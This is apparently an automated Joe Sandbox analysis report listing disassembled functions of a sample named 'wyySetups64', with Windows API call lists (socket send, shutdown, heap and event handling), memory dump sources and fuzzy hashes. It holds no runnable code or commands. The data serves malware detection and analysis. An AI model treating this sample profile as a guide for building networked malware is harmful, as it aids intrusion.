                                                                                                                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 127459856-0
                                                                                                                                                                                                              • Opcode ID: f7a9d60d2b7f029730e42d616df30a7848541e926e6cf6671cc0a85a0010d67f
                                                                                                                                                                                                              • Instruction ID: febbaa37fef173cdabf19aaa86991a713f8cd3613784196dc8ccc12f3e68bcc5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7a9d60d2b7f029730e42d616df30a7848541e926e6cf6671cc0a85a0010d67f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB41CEB1600704AFD360EF69DC81B6AF7E4FB48714F50086EE646D7781EBB1E9048B91
                                                                                                                                                                                                              Function 03373500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03373660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03373667
                                                                                                                                                                                                                • Part of subcall function 03373660: _free.LIBCMT ref: 0337369C
                                                                                                                                                                                                                • Part of subcall function 03373660: _malloc.LIBCMT ref: 033736D7
                                                                                                                                                                                                                • Part of subcall function 03373660: _memset.LIBCMT ref: 033736E5
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(033A1F0C), ref: 03373565
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(033A1F0C), ref: 03373573
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0337359A
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 033735B3
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,033A1F0C), ref: 033735EE
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 03373621
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03373639
                                                                                                                                                                                                                • Part of subcall function 03373F60: GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                                • Part of subcall function 03373F60: send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                                • Part of subcall function 03373F60: SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                                • Part of subcall function 03373F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                                • Part of subcall function 03373F60: WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                                • Part of subcall function 03373F60: shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                                • Part of subcall function 03373F60: closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 03373649
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 127459856-0
                                                                                                                                                                                                              • Opcode ID: ea7780c26d88609a861b18da7b5fef2ca541e5e0e60905f539f63b516eb4691b
                                                                                                                                                                                                              • Instruction ID: 8d798f17a1218ea43d02eb612a77ec3123eb40f8acb29a5ca2a6fe9fa54a0467
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea7780c26d88609a861b18da7b5fef2ca541e5e0e60905f539f63b516eb4691b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22415BB5600B04AFD3B0EF69DCC1B6AB7E8FB48721F10492EE646D7640D7B5E4048B91
                                                                                                                                                                                                              Function 00BD4430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD4443
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD444C
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD444E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD445D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 00BD44AB
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD44C8
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD44DC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542259498-0
                                                                                                                                                                                                              • Opcode ID: 14498a025f7dfd3d09e4db9ce8314c30ac7821e4f75ca19460f9ba2790d6c727
                                                                                                                                                                                                              • Instruction ID: e94d5fc3104a6949863f92f025fff4107300c8ab6dbc26429c79791c50e93d09
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14498a025f7dfd3d09e4db9ce8314c30ac7821e4f75ca19460f9ba2790d6c727
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F215276640B045BC630EF69EC85B97F3E8EF99710F100A5EF549C7751EA71A4408BA1
                                                                                                                                                                                                              Function 03374430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 03374443
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 0337444C
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 0337444E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0337445D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 033744AB
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 033744C8
                                                                                                                                                                                                                • Part of subcall function 03373F60: GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                                • Part of subcall function 03373F60: send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                                • Part of subcall function 03373F60: SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                                • Part of subcall function 03373F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                                • Part of subcall function 03373F60: WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                                • Part of subcall function 03373F60: shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                                • Part of subcall function 03373F60: closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 033744DC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542259498-0
                                                                                                                                                                                                              • Opcode ID: c891bd4b2b9bb78cba250863596461a7b3b1f866cdd958a208f2c9f617a7c3f0
                                                                                                                                                                                                              • Instruction ID: cf1c4d8680baccb441712283c8db4b40af6b6252a188f07fc59ba03bdf81656b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c891bd4b2b9bb78cba250863596461a7b3b1f866cdd958a208f2c9f617a7c3f0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90216476600708ABC230EF79DCC4B97B3E8EF89720F100A1EE589C7640D675F4459BA1
                                                                                                                                                                                                              Function 00BD4E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 00BD4E79
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 00BD4E98
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 00BD4EA2
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 00BD4EB9
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BD4EC2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BD4EC9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 4bc90e43f67cb467076a99ac15caf6d90062f9d9fca423b96a45eca4866e38f3
                                                                                                                                                                                                              • Instruction ID: 9da6d2d1c9a4428164ff339640e1b2fe3642301a7cda16ea26b043e23239275f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc90e43f67cb467076a99ac15caf6d90062f9d9fca423b96a45eca4866e38f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 361160326007449BC330EB79AD8596BF3ECFB88325B44066BF605C7651EB71D805C6A5
                                                                                                                                                                                                              Function 03374E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 03374E99
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 03374EB8
                                                                                                                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 03374EC2
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 03374ED9
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03374EE2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 03374EE9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 707f6d4641795719bdcf1789fabb5b514d89553d7ecfcdff8f938b33469e3077
                                                                                                                                                                                                              • Instruction ID: 1da8f176dba9f6d9c463732ffee714b754c64503a3e094bd8ec03fa19ab3e7b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 707f6d4641795719bdcf1789fabb5b514d89553d7ecfcdff8f938b33469e3077
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23116D327007089BD330EB7AECC496BF3ECEB88721B040A2BE645C6550DA76E805C7A5
                                                                                                                                                                                                              Function 0337DD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0337DD32
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0337DE35
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                              • String ID: Main
                                                                                                                                                                                                              • API String ID: 1452528299-521822810
                                                                                                                                                                                                              • Opcode ID: 8033ef0bdb21022605198f68d82f945de9d593d0c46af187de0741f23e255f89
                                                                                                                                                                                                              • Instruction ID: 5a046cf80e71a709acee3e157cad3748c62034f671db9ca7615a79689281e3b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8033ef0bdb21022605198f68d82f945de9d593d0c46af187de0741f23e255f89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341C131A50209EFE720DF58DCC1BAAB3E8FF94314F0846AAE8459B751E775E941CB90
                                                                                                                                                                                                              Function 00BD3F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,74DEDFA0,00BD3648), ref: 00BD4054
                                                                                                                                                                                                                • Part of subcall function 00BD2B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00BD2B96
                                                                                                                                                                                                                • Part of subcall function 00BD2B80: SwitchToThread.KERNEL32 ref: 00BD2BAA
                                                                                                                                                                                                              • send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3254528666-0
                                                                                                                                                                                                              • Opcode ID: 107276a2256c58a6678f11c24229f41d39f5d25ba330f0a80981c6933fa4659f
                                                                                                                                                                                                              • Instruction ID: 9dfebc4420cc8c20e2aff90f139f30fdcdca026e0eb9a5286ec2e451f278caf4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 107276a2256c58a6678f11c24229f41d39f5d25ba330f0a80981c6933fa4659f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D215570200B009BD3309B68D888B9BB7F5FF44B14F04494EF2868BB91EBB9E845CB51
                                                                                                                                                                                                              Function 03373F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03373648), ref: 03374054
                                                                                                                                                                                                                • Part of subcall function 03372BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03372BD6
                                                                                                                                                                                                                • Part of subcall function 03372BC0: SwitchToThread.KERNEL32 ref: 03372BEA
                                                                                                                                                                                                              • send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3254528666-0
                                                                                                                                                                                                              • Opcode ID: 47795253848a485cdb9f24e192315d46ac9852025c19c4e2f293ed94eb68ad1b
                                                                                                                                                                                                              • Instruction ID: e1bc21e90331e11e2923f63da68d960c314ac03ecee21828c21783e06837c1a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47795253848a485cdb9f24e192315d46ac9852025c19c4e2f293ed94eb68ad1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F421D775200B04DBD334EB69D8C8B5BB7B9BB44711F144E1DE692CA680C7BAE445DB90
                                                                                                                                                                                                              Function 00BD4060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4074
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4087
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4090
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4099
                                                                                                                                                                                                                • Part of subcall function 00BD1350: HeapFree.KERNEL32(?,00000000,?,?,?,00BD40A6,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD1390
                                                                                                                                                                                                                • Part of subcall function 00BD1420: HeapFree.KERNEL32(?,00000000,?,?,?,00BD40B1,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD143D
                                                                                                                                                                                                                • Part of subcall function 00BD1420: _free.LIBCMT ref: 00BD1459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD40B9
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD40D4
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4150
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD4157
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1219087420-0
                                                                                                                                                                                                              • Opcode ID: f3d2157dcae2d40242dbd038715d64a3dbe72f4fbd9e7e8d2f4615d895571481
                                                                                                                                                                                                              • Instruction ID: 15e5215a37fcfa742dcede7a535289a623864ffbed25af8d58a429be7de7bace
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3d2157dcae2d40242dbd038715d64a3dbe72f4fbd9e7e8d2f4615d895571481
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C312674600A06AFD705DB78C898B96FBE8FF48314F14829AE5298B361DB35B855CFD0
                                                                                                                                                                                                              Function 03374060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374074
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374087
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374090
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374099
                                                                                                                                                                                                                • Part of subcall function 03371350: HeapFree.KERNEL32(?,00000000,?,?,?,033740A6,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03371390
                                                                                                                                                                                                                • Part of subcall function 03371420: HeapFree.KERNEL32(?,00000000,?,?,?,033740B1,?,00000000,03374039,?,74DEDFA0,03373648), ref: 0337143D
                                                                                                                                                                                                                • Part of subcall function 03371420: _free.LIBCMT ref: 03371459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 033740B9
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 033740D4
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374150
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,03374039,?,74DEDFA0,03373648), ref: 03374157
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1219087420-0
                                                                                                                                                                                                              • Opcode ID: 116cbfa180d1c01bbb261e32f5952eb8106c98cfbe6a661a85acac52a303a025
                                                                                                                                                                                                              • Instruction ID: c5654930a3dd68abda9a1d3539a6e59cefcc6783377c8f2594348bfd564f640f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 116cbfa180d1c01bbb261e32f5952eb8106c98cfbe6a661a85acac52a303a025
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1314875600A0AEFD749EB35D898B96F7A8FF48310F04865AE429CB250DB39B851CFD0
                                                                                                                                                                                                              Function 031FB62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_malloc
                                                                                                                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                                                                                                                              • API String ID: 3506388080-713438465
                                                                                                                                                                                                              • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                                                              • Instruction ID: dd1ad63eba9e07079fd21c1513c8aa9b0f86df979a1e32e36abfabad1186f68b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8D18CB1E00318AFDB14DFE9DC85AAEFBB9FF48300F144129E505AB291D770A945CBA1
                                                                                                                                                                                                              Function 00BD2140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
